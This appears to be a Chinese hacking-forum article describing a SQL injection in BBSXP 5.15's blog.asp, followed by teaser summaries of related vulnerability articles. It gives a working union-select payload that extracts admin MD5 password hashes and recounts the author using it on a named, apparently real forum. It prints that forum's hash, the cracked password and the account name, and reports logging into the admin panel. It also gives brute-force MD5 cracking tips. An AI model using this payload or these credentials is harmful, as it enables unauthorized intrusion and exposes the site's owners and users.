BBSXP5.15最新漏洞精简版_漏洞研究

首先打开www.google.com在输入Po......bBsxp5.15有很多这样的论坛,随便点个,好就这个bbs.yuntea.com 真幸运,这个站还没打上补丁,一口做气杀到底,bbsxp5.15最新漏洞 ,漏洞主要出在BLOG.ASP 可以让直接构造数据库命令    

blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]   

后台区长的md5密码就显示出来了。   

前台密码也可以出来,   

网上已经有相关动画,软件。   

就利用这个漏洞,肯定有一批bbsxp的网站要倒下了   

接下来就是讲工具了,准备好MD5密码破解器   

关于md5的破解,比较好使的有md5cracker速度增强版。   

1。先用8位或9位数字跑。很快。   

2。如果不行,用小写字母跑。选择5-6位比较好。   

3。再不行,说明密码可能使字母加数字,可以碰碰运气。可以配置一个精品自典,比如10G的,   

   跑上及几个小时。(你的机器配置必须很好)   

4。再不行,建议放弃,太变态了。   

前台ok...后台密码..(注:你必须知道管理员的帐号)   

直接默认的配置就是直接拿下后台密码...   

直接吧前台md5密码暴出来。   

剩下的事就事破解md5了。   

现在开始进行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]   

就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]   

他的密码是7CB2BE65EB9F215215A0725A10B6E39E可能前台的密码和后台一样,如果有2个加密密码那就是代表1个是前台的一个是后台的,不多说了,看操作   

按照上面工具的介绍先用数字把,   

正在破===耐心等等   

我接条信息,大家不介意把~   

出来了,密码是82246124,登入,,他的帐号是wzwu,密码82246124,登入成功,后台登入,密码82246124,登入成功,下面的因该知道把,我也就不多说了,以免遭到人家的痛骂。   

bBsxp5.15最新漏洞的原始作者不清 

时间: 2024-12-22 21:09:58

BBSXP5.15最新漏洞精简版_漏洞研究的相关文章

从黑客的角度来找出网络安全漏洞精简版

以下的文章主要向大家讲述的是从黑客的角度来来找出网络安全漏洞,其中也有都对用开源工具收集安全漏洞信息,从外部审视网络安全漏洞等相关内容的描述,以下就是文章的主要内容的纤细解析.作为企业安全管理员来说,当然希望企业拥有一个相对完美的系统,但在实际看来这是不可能的.往往某个系统或软件的漏洞就会被黑客所利用,正所谓师夷长技以制夷,通过黑客的眼光来审视网络安全性,往往可以发现很多潜在的安全漏洞.这样做不仅提供了审视你网络系统的不同视角,而且让你能够从你的 敌人,即黑客的角度来指导你采取最有效的网络安全措

EXE文件解析远程代码执行漏洞精简版

此文章主要讲述的是EXE文件解析远程的代码执行漏洞,以下就是文章就是对EXE文件解析远程的代码执行漏洞的主要内容的详细描述,望大家在浏览之后会对其有更深的了解,望大家能有所收获.受影响系统:Panda Antivirus描述:BUGTRAQ ID: 24989熊猫卫士是熊猫系列杀毒软件,支持对多种文件格式进行病毒分析.熊猫卫士的文件解析引擎在解析畸形.EXE文件时整数负值过程中存在缓冲区溢出,如果用户受骗打开了恶意的 可执行文件的话,就可能触发这个溢出,导致在用户系统上执行任意代码.<*来源:S

IIS漏洞整理大全_漏洞研究

去年下半年关于IIS的漏洞层出不穷,鉴于目前IIS的广泛使用,觉得有必要把收集的资料加以总结一下.  1.介绍  这里介绍的方法主要通过端口80来完成操作,具有很大的威胁性,因为作为网络服务器80端口总要打开的.如果想方便一些,下载一些WWW.CGI扫描器来辅助检查.  而且要知道目标机器运行的是何种服务程序,你可以使用以下命令:  telnet <目标机> 80  GET HEAD / HTTP/1.0  就可以返回一些域名和WEB服务程序版本,如果有些服务器把WEB服务运行在8080,81

网站程序中非SI漏洞的利用_漏洞研究

Part I 前言  现在网上最流行的网站攻击手段,要数得上SQL Injection了,虽然SI技术易学易用,并且容易取得较大的权限,但因其风头实在太大,现在一般稍有点安全意识的程序员都会注意到这个问题,并且通过GET方法提交的数据会被服务器记录在案,而让网管很容易找到入侵者.  非SI类攻击相对来说获得的服务器操作权限不大,但对于以获得数据为目的的入侵还是很有用的.  Part II 方法介绍  常规的非SI类攻击有如下几种:  一. 跨站脚本攻击(XSS)  跨站脚本攻击不会直接对网站服务

针对蓝牙PIN码的最新攻击技术细节分析_漏洞研究

注:本文章只是讲解决针对蓝牙PIN码的最新攻击技术,以提醒大家注意防范,并没有其它目的.任何人不得使用本文中所介绍的技术做非法的事. 最近,国内外多家网站纷纷刊登了一则关于针对蓝牙PIN码的最新攻击技术的新闻:通过强制两个正在通讯的蓝牙设备进行重新配对,并监听配对信息,攻击者可以在0.063秒内破解一个4位(十进制)的PIN码.今年6月上旬举办的世界无线技术会议也详细讨论了该攻击方法,securityfocus 甚至说"这种新的攻击技术令很多关注无线技术的信息安全专家非常的震惊,因为以前关于攻击

云网在线支付漏洞初探(图)_漏洞研究

理解这个漏洞呢,首先要了解一下在线支付的流程,这里引用一下云网官方的流程图: 正常的在线支付过程呢,是从第一步到第六步! 而这个漏洞所出现的地方就是在第二步,然后绕过了第三步和第四步.第五步,而直接把返回信息提交给了支付成功返回页面! 我们在动画里也只是看到了!它只有一个提交页面和网站上的一个支付成功页面,根本没有通过网关进行支付操作,所以钱也就没进入到银行里,这里也就不存在什么影响银行安全什么了,纯粹是骗人的了! 为什么会这样呢!问题出在云网提供给商户的支付接口文件上,让我们来看看这两个云网提

phpBB 2.0.13惊现漏洞的解决_漏洞研究

一.Path Disclosure  漏洞文件/db/oracle.php 漏洞描叙直接访问oracle.php导致暴露web路径 涉及版本phpbb <=2.013 测试ie提交http://127.0.0.1/phpBB2/db/oracle.php 返回错误 Fatal error: Cannot redeclare sql_nextid() in f:\easyphp1-7\www\phpbb2\db\oracle.php on line 405 解决办法 如果你不是采用的oracle数

如何对PHP程序中的常见漏洞进行攻击_漏洞研究

[库文件] 正如我们前面讨论的那样include()和require()主要是为了支持代码库因为我们一般是把一些经常使用的函数放到一个独立的文件中这个独立的文件就是代码库当需要使用其中的函数时我们只要把这个代码库包含到当前的文件中就可以了. 最初人们开发和发布PHP程序的时候为了区别代码库和主程序代码一般是为代码库文件设置一个".inc"的扩展名但是他们很快发现这是一个错误因为这样的文件无法被PHP解释器正确解析为PHP代码.如果我们直接请求服务器上的这种文件时我们就会得到该文件的源代

BBSXP漏洞再探究_漏洞研究

注本文已发表在<黑客X档案>2005年6期版权归其所有转载请保持文章完整性并注明版权 最近BBSXP论坛可以说是一点都不平静.漏洞一个接一个暴出来.上次对showforum.asp这个文件的漏洞分析过后没多久又暴出blog.asp存在漏洞.于是俺这个菜鸟的心再不能平静了不要每次都等着人家给我们找漏洞咱自己也来分析一把看看. 首先我们回顾一下showforum.asp中的漏洞还记得order变量是经过了HTMLncode过滤了以后才放到SQL语句中去执行的.再来看看blog.asp中出漏洞的地方